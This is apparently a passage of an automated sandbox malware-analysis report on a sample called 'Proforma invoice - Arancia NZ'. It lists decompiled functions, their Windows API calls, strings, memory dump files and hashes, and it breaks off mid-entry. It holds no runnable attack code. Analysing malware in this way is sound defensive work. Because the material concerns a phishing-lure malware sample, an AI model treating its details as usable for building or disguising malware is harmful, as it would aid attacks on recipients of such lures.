                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_memmove
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                    • Opcode ID: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
                                                                                                                    • Instruction ID: 206c80dc189458ff7afd1c05a25627b97915631d34a2214a7a1c9f54031ffa71
                                                                                                                    • Opcode Fuzzy Hash: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
                                                                                                                    • Instruction Fuzzy Hash: 6A11B6309A112D79D720BB61DC59DFF7BBCEB91B81F000459B841A60D1DEB00D18C9B4
                                                                                                                    Function 002B46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                    • Opcode ID: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
                                                                                                                    • Instruction ID: b83db3b2a5d62ad2e38940b4edcf029ee92d2824126a48d37ad693de5eb50371
                                                                                                                    • Opcode Fuzzy Hash: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
                                                                                                                    • Instruction Fuzzy Hash: EE113D31920115AFDB20BB30AC8AEEAB7BCEF02311F0441B6F54AD6092FF709D95DA55
                                                                                                                    Function 002B4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 002B4F7A
                                                                                                                      • Part of subcall function 0027049F: timeGetTime.WINMM(?,75A8B400,00260E7B), ref: 002704A3
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 002B4FA6
                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 002B4FCA
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B4FEC
                                                                                                                    • SetActiveWindow.USER32 ref: 002B500B
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B5019
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 002B5038
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 002B5043
                                                                                                                    • IsWindow.USER32 ref: 002B504F
                                                                                                                    • EndDialog.USER32(00000000), ref: 002B5060
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
                                                                                                                    • Instruction ID: 1aea502a5ae7a9a047cc48fb3298f14c23a26be2f8ce2a1a5d23a5c2713e1eb4
                                                                                                                    • Opcode Fuzzy Hash: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
                                                                                                                    • Instruction Fuzzy Hash: A821F970616601BFE7116F60FDCDBF63BAEEB4E385F045425F106821B1CB718D208A65
                                                                                                                    Function 002BD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002BD5EA
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BD67D
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 002BD691
                                                                                                                    • CoCreateInstance.OLE32(002E2D7C,00000000,00000001,00308C1C,?), ref: 002BD6DD
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BD74C
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 002BD7A4
                                                                                                                    • _memset.LIBCMT ref: 002BD7E1
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 002BD81D
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BD840
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 002BD847
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BD87E
                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 002BD880
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
                                                                                                                    • Instruction ID: 432f3ced38915bbd3e9d9680d91c8f3e53f5ee586b51e65f7b06306e9eb1a521
                                                                                                                    • Opcode Fuzzy Hash: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
                                                                                                                    • Instruction Fuzzy Hash: 4AB10975A10109EFDB04DFA4D888DEEBBB9EF48304B148469E90AEB261DB30ED55CF54
                                                                                                                    Function 002AC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 002AC283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002AC2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 002AC2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002AC364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002AC372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002AC3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002AC3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002AC3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002AC3FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
                                                                                                                    • Instruction ID: 15981a9deb1a9106a347a3cbdede4163458475c836db2ebf7e577147739ea253
                                                                                                                    • Opcode Fuzzy Hash: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
                                                                                                                    • Instruction Fuzzy Hash: EA514271F10205AFDF18CFA9DD89AAEBBB9EB88310F14812DF516D7290DB709D008B54
                                                                                                                    Function 0025201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002520D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0025216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0028BCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0028BD1C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
                                                                                                                    • Instruction ID: 352841b699890e6dd276e509f894ad709eb1aa44ad62d3f93d53f3901403c11e
                                                                                                                    • Opcode Fuzzy Hash: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
                                                                                                                    • Instruction Fuzzy Hash: E5618E35622A01DFDB36AF14D948B66B7F1FB95312F10842DE842579E1C770ACA9CF48
                                                                                                                    Function 002521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002521D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
                                                                                                                    • Instruction ID: fbc6b02ca847a2452753e3a26a4a8bb7ab54a98d74dd6ef47957461a39b418d2
                                                                                                                    • Opcode Fuzzy Hash: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
                                                                                                                    • Instruction Fuzzy Hash: 0D41F839511101DFDB215F28EC88BB93B65EB07332F544266FD65CA1E1C7318C5ADB19
                                                                                                                    Function 002BA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,002DF910), ref: 002BA90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003089A0,00000061), ref: 002BA9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 002BA9FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
                                                                                                                    • Instruction ID: 093e01af3e07d5b05b26766bff36371412ea802d571ac4ff860fdf2c1b449ebe
                                                                                                                    • Opcode Fuzzy Hash: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
                                                                                                                    • Instruction Fuzzy Hash: B051AC315383019BC300EF14C892AAFB7A5FF84780F54482DF996572A2DB719D29CE93
                                                                                                                    Function 00259837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 7ec5b03edd0edbd03710ec2be732ff8baa3fe3292a7f2c877e5ee93efdbdbb9c
                                                                                                                    • Instruction ID: fa9afd78785369da5628b19428cfd5c459d7e019a62d05a1260c6e76ba9ac18f
                                                                                                                    • Opcode Fuzzy Hash: 7ec5b03edd0edbd03710ec2be732ff8baa3fe3292a7f2c877e5ee93efdbdbb9c
                                                                                                                    • Instruction Fuzzy Hash: 31412871531206EFDB24EF34D946E7A73E8FF05300F2444BEE949D7281EA75A9658B10
                                                                                                                    Function 002D7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002D716A
                                                                                                                    • CreateMenu.USER32 ref: 002D7185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 002D7194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7221
                                                                                                                    • IsMenu.USER32(?), ref: 002D7237
                                                                                                                    • CreatePopupMenu.USER32 ref: 002D7241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D726E
                                                                                                                    • DrawMenuBar.USER32 ref: 002D7276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
                                                                                                                    • Instruction ID: 15358dc03787ce5b4745dab97e8aeefdc6b167a86233b3895cd3efbf2e682304
                                                                                                                    • Opcode Fuzzy Hash: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
                                                                                                                    • Instruction Fuzzy Hash: 1E414774A11205EFDB20DF64E988E9A7BB5FF49310F14402AFD0697360E735AD20CB90
                                                                                                                    Function 002D74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002D7565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D7578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002D7580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002D758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 002D7594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002D759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D75B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D75BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
                                                                                                                    • Instruction ID: 01c75a29b9b19090d2a78609e649714c5a9329cf97b569b14cf7d20a62ff86cd
                                                                                                                    • Opcode Fuzzy Hash: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
                                                                                                                    • Instruction Fuzzy Hash: 0D318D72515215BBDF129F64EC08FDA3B69FF09321F114226FA16A22A0D735DC21DBA8
                                                                                                                    Function 00276E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00276E3E
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00276ED7
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00276F0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00276F2A
                                                                                                                    • __allrem.LIBCMT ref: 00276F80
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276F9C
                                                                                                                    • __allrem.LIBCMT ref: 00276FB3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276FD1
                                                                                                                    • __allrem.LIBCMT ref: 00276FE8
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277006
                                                                                                                    • __invoke_watson.LIBCMT ref: 00277077
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction ID: 4a99907ff3a3dc5454d7736ff5cf0a9f7dd36d14e3ee2999a387ce59156bdb3c
                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction Fuzzy Hash: D3710676A21B17ABD714EE78DC45B6BB3A8AF04724F14C229F518E76C1E770DD208B90
                                                                                                                    Function 002B2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2542
                                                                                                                    • GetMenuItemInfoW.USER32(00315890,000000FF,00000000,00000030), ref: 002B25A3
                                                                                                                    • SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B25D9
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 002B25EB
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 002B262F
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002B264B
                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 002B2675
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 002B26BA
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2700
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2714
                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
